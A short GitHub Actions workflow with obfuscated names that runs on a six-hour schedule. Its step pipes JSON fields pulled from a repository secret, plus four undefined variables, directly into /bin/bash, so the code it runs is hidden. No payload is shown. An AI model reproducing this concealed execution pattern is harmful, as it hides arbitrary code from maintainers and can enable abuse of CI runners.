name: sleepynhajk
on:
  workflow_dispatch:
  schedule:
    - cron: '34 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sleepynhajk
        env:
          nxa1471: ${{ secrets.nxa1471 }}
        run: |
          echo $nxa1471 | jq -r .hxoe021 | /bin/bash
          echo $iyw1536 | jq -r .sbtz9 | /bin/bash
          echo $l86723 | jq -r .pww4 | /bin/bash
          echo $uq64421 | jq -r .hu13 | /bin/bash
          echo $buo85 | jq -r .t06 | /bin/bash

